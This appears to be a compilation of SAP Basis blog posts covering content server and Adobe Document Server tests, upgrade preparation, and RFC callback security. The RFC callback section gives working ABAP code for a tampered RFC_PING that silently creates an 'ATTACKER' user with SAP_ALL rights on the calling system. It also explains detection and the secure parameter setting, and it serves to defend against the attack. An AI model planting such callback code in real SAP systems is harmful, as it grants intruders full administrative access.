SAP content server technical tips and tricks

This blog will give you technical tips and tricks regarding the SAP content server.

Questions that will be answered are:

  • How can I check technical connection to content server?
  • How can I check that the content server functions work from technical side?

Technical connection test to SAP content server

The first obvious connection test is in the administration function of the content server. Start transaction OAC0 (starts with letter O and ends with zero) and select your content server. On the next screen hit the check button. If the test is ok, click on the CSADMIN button and the detailed screen comes. There should be a green light behind your content repository. If no connection or no green light, there are issues in the linking and communication to content server (content server down, firewall block, etc).

Technical function test of SAP content server

To test if all the SAP content server functions are working from the technical level you can use test program RSCMST. Unfortunately there is no transaction linked by SAP, so you have to use SE38 or SA38 to start the program. After filling out the content server on first screen, you come to the second screen where you can launch the detailed tests. Per test you have to click the execute button.

Test program RSCMST result screen

Green means test has run and ok. Red is the unfortunate one where test has run and result is not ok. Yellow means test has not yet been executed.

In an ideal case all lights are green. If you have red light best to fix it by either applying OSS note to ABAP server or patch to content server.

Your specific company might not use all the technical options for content server (like the above HTTP using mCreate), but this is hard to correlate to end user scenario’s. If your users are facing issues with content server and not all lights are green on this report, it is a basis issue to be solved.

More background on the tests: OSS note 1482012 – Check the connection to content server.

Remark: the test program RSCMST can have bugs by itself. So check for latest version of this program and apply the OSS notes before running and relying on the program. Last known updates are from July 2017, by looking at keyword RSCMST in the SAP notes.

Content server performance

Program RSHTTP80 can be used to test the content server performance.

Testing cache server setup

If you have a cache server setup and want to check if that works properly, also here test program RSCMST is used. Read OSS note 2083855 – How to check cache server access on the exact parameters to fill out.

Adobe document server (ADS) technical tips and tricks

This blog will provide technical tips and tricks for Adobe Document Server (ADS) used from ABAP stack.

Questions that will be answered are:

  • How to retrieve ADS version information from ABAP stack?
  • How to test if the technical and functional connection from ABAP stack to ADS is working?
  • Where to find information on Adobe LifeCycle Designer?
  • Where to find more information on further issue analysis?

Reading the Adobe Document Server version from the ABAP stack

Run program FP_PDF_TEST_00 (unfortunately no transaction linked, so you need to run it from SE38 or SA38). Result is the ADS server version information.

ADS link test programs

There are two main test programs to run to check the connection from the ABAP stack to the Adobe Document Server.

First run program FP_PDF_TEST_00 (unfortunately no transaction linked, so you need to run it from SE38 or SA38). The output will be the version number of the Adobe Document server. If this check works, the connection from ABAP to ADS is working at network level and low basis level.

The second test program is called FP_CHECK_DESTINATION_SERVICE (unfortunately no transaction linked, so you need to run it from SE38 or SA38). The output is just number of bytes sent. If this check works, the connection from ABAP to ADS is working for functional forms connection as well.

Adobe LifeCycle designer

For developing the forms you need to install Adobe LifeCycle designer on your developer laptop or desktop. The most recent list of versions and patches is kept on dedicated SAP wiki page.

Further issue analysis on setup

Follow the step in this SAP blog for further issue analysis. If this blog does not help, you can use the details from the very extensive OSS note “944221 – Error analysis for problems in form processing”.

Switching on standard SAP delivered ADS forms

SAP has delivered many ADS forms to replace existing SapScript and SmartForms. Unfortunately these are not default turned on. Also not on newly installed systems. To unlock all the standard SAP delivered ADS forms, goto SFW5 and activate the switch ERP_ALL_FORMS:

switch ERP_ALL_FORMS

After this is done, run report RERP_EHP_SHOW_FORM_LIST. This list will give you pointer for each form what to change in customizing to point to new ADS form.

Adobe licenses

The general use to print output via ADS is included in the SAP license. If you want to use the advanced interactive form capability: this is subject to extra license. See oss note 750784 – SAP Interactive Forms: Licenses.

RFC callback hacking

This blog explains about RFC callback hacking.

When you start transaction SM59 for setting up RFC connections, you might see the red icon telling you RFC callback check not secure.

RFC callback not secure

This blog will explain you following:

  • How can a hacker exploit this RFC callback weakness?
  • How to make the RFC callback secure?
  • What is the difference between RFC callback simulation and intervention?
  • What to do in case of a valid use of RFC callback?

RFC callback hacking in action

What the RFC callback does is basically firing back function modules to the sender. These modules are then executed on the originating system with the privileges of the original caller.

If an attacker has gained access to one system and modifies code that is called from another system it can fire commands to the other system with the privileges of the caller.

In the example below the attacker has altered the standard RFC_PING function module (code snippet is below). He then convinces a high privilege admin of the target system to remotely call and ping the compromised system for example by asking the admin to do a connection test in SM59 (which calls the RFC_PING module). The callback code is fired against the target system and is run with the user ID of the admin (not of the attacker) of the target system.

RFC callback hack explanation

Code snippet of modified RFC_PING:

  • Call module to create user on destination ‘BACK’ and set the password.
  • Assign the privilege SAP_ALL (highest available privilege)
 DATA: ZLV_BAPIBNAME TYPE SY-UNAME.
 DATA: ZLS_BAPILOGOND TYPE BAPILOGOND.
 DATA: ZLV_BAPIPWD TYPE XUNCODE.
 DATA: ZLS_BAPIADDR3 TYPE BAPIADDR3.
 DATA: ZLT_BAPIRET2 TYPE TABLE OF BAPIRET2.
 DATA: ZLS_BAPIPROF TYPE BAPIPROF.
 DATA: ZLT_BAPIPROF TYPE TABLE OF BAPIPROF.
 
   ZLV_BAPIBNAME = 'ATTACKER'.
   ZLS_BAPILOGOND-USTYP = 'A'.
   ZLV_BAPIPWD = 'Welcome_in1!'.
   ZLS_BAPIADDR3-LASTNAME = 'Attacker'.
 
   CALL FUNCTION 'BAPI_USER_CREATE1' DESTINATION 'BACK'
     EXPORTING
       USERNAME                      = ZLV_BAPIBNAME
       LOGONDATA                     = ZLS_BAPILOGOND
       PASSWORD                      = ZLV_BAPIPWD
       ADDRESS                       = ZLS_BAPIADDR3.
 
 ZLS_BAPIPROF-BAPIPROF = 'SAP_ALL'.
 APPEND ZLS_BAPIPROF TO ZLT_BAPIPROF.
 ZLS_BAPIPROF-BAPIPROF = 'SAP_NEW'.
 APPEND ZLS_BAPIPROF TO ZLT_BAPIPROF.
 
 CALL FUNCTION 'BAPI_USER_PROFILES_ASSIGN' DESTINATION 'BACK'
   EXPORTING
     USERNAME       = ZLV_BAPIBNAME
   TABLES
     PROFILES       = ZLT_BAPIPROF
     RETURN         = ZLT_BAPIRET2.

If the admin executes the ping towards the compromised system he will see this screen:

RFC ping

The only suspicious part the admin might see is the slightly longer logon time (in which the callback is executed).

End result on target system: ATTACKER user created by ADMIN user.

Attacker user created

With the privileges:

Attacker admin privileges assigned

This is one example. There are many different creative ways in which a callback RFC can be misused.

Detection of the RFC callbacks

RFC callback actions are registered in the SAP audit log if they are configured. The default classification is warning for RFC callback.

Audit log trace for the above action looks as follows:

Audit log for user ADMIN

How to make the RFC callback secure?

The SAP system parameter rfc/callback_security_method (set it in RZ11) is determining the RFC callback behaviour.

rfc/callback_security_method set to 1 means basically “do nothing”. This is the insecure default setting and it will result into the red traffic light on SM59 RFC connection setup screen.

rfc/callback_security_method set to 2 means “simulation active”. With this setting entries are written to the audit log (for setup of the audit log see this blog).  This setting is still insecure!

It can be used on a productive system to see which callbacks are coming in and do analysis before switching to 3 (fully secure, but immediate interception).

rfc/callback_security_method set to 3 means that the system will do interfception of RFC callback methods. This is the secure setting. The SM59 RFC connection traffic light will now show green:

RFC callback secure

Callback positive lists

In some cases an RFC callback is used with a good intention and reason. These exceptions can be put into the callback positive list. Per RFC on the Logon & security tab you can activate the combination of called and called back function modules.

Known positive callback: SAP CUA

SAP CUA (central user administration) uses a callback to fetch profiles. In your CUA system per RFC to remote child CUA system you have to set the following positive callback:

CUA postive callback settings

(SUSR_ZBV_GET_REMOTE_PROFILES and SUSR_ZBV_SEND_PROFILES)

Known positive callback: SAP screen painter RFC EU_SCRP_WN32

In the screen painter RFC EU_SCRP_WN32 add the following list of modules:

RS_SCRP_GF_PROCESS_640         RFC_GET_FUNCTION_INTERFACE

RS_SCRP_GF_PROCESS_640         RS_SCRP_GF_RBUILDINFO

RS_SCRP_GF_PROCESS_640         RS_SCRP_GF_RELEMTABLE

RS_SCRP_GF_PROCESS_640         RS_SCRP_GF_RICONS

RS_SCRP_GF_PROCESS_640         RS_SCRP_GF_RKEYS

RS_SCRP_GF_PROCESS_640         RS_SCRP_GF_RKEYTEXTS

RS_SCRP_GF_PROCESS_640         RS_SCRP_GF_RMESSAGES

RS_SCRP_GF_PROCESS_640         RS_SCRP_GF_RPROPTABLE

RS_SCRP_GF_PROCESS_640         RS_SCRP_GF_RSTATUS_40

RS_SCRP_GF_PROCESS_640         RS_SCRP_GF_RTEXTS

RS_SCRP_GF_PROCESS_640         RS_SCRP_GF_RDDICFIELDS

The screen painter is hardly used nowadays at all. Normally developer use this tool only on development system.

Preparation for SAP upgrade or support package

This blog explains about preparation you can do for SAP upgrade of support package.

Questions that will be answered are:

  • Where to find support package schedule?
  • Where to find version information on upgrades?
  • Do I need to do delta sizing for upgrade?

Latest availabale main version for upgrade

For the latest available version you can check the SAP product availability matrix site. This is also know as the SAP-PAM.

After finding the right product on the first tab you can see the current release details and end of support date.

PAM details release and support dates

On the second tab you see the upgrade paths that are supported:

PAM details upgrade paths

In the middle the target version. On the left hand the versions from which you can upgrade. To the right are even higher versions you can upgrade to.

Latest available versions of support packages

The latest availabe versions of support packages are published by SAP on the SAP support package stacks page. On this page click on the SAP support package stack maintenance schedule link to download the latest version of the schedule.

Support package version: minus one or latest?

In many companies there is a policy to never take the latest version of a support package. The line of thinking is: let other people solve the bugs of SAP first.

Current delivery of ABAP support packages is quite good. And the frequency is not so high as in the past. For ECC about 2 to 3 support packages per year are released (as compare to 6 to 9 in the past in the 4.6 ages).

In stead of taking minus one, you can also consider this rule: at point of go-live make sure that the support package is at least released 3 months ago. This will counter the risk of having an issue which is not discovered by anyone else before.

Delta sizing

Delta sizing for support packages is not needed. Delta sizing for an upgrade might be required if:

  • Upgrade crosses multiple versions (for example upgrade from Netweaver 6.20 to Netweaver 7.51)
  • Upgrade is including a new database (for example migration to HANA database)
  • Specific upgrade manual is specific about delta sizing (for example the upgrade from SAP solution manager 7.1 to 7.2 is specific enough to carry out delta sizing)

Custom code

For analyzing custom code before the upgrade you can use the CDMC toolset. For more information read this blog.

Releasing transports and cleaning up transport pipeline

For both support package and upgrade releasing transports is a technical must. It is wise to start a few months before already cleaning up the transport pipeline (transports that are old and not released in development system, transports that are imported into quality environment, but no imported in productive system).

Side effect report for support packages

Per support package SAP keeps track of the unwanted side effects. OSS note 2388572 explains you how to retrieve them for your support package. Best to scan the side effects and apply the ones you think are needed.

For upgrades the side effects list is too large: here you simply need to test and fix any issues encountered.

New functions

After the upgrade you can start to use new functions. Some main functions are listed in the SAP help pages. The more unkown small features are listed by SAP in the SAP improvements finder xls. This xls has 2 tabs: first with the most recent and second with the long list of improvements since 2014. Per improvement you need to check pre-conditions of release and support package, but if you upgraded to recent version, most of the improvements will be installed. Some improvements are always active, some need extra activation steps. This is documented per improvement item.

Aftercare after upgrade

For aftercare after upgrade or support package read this blog.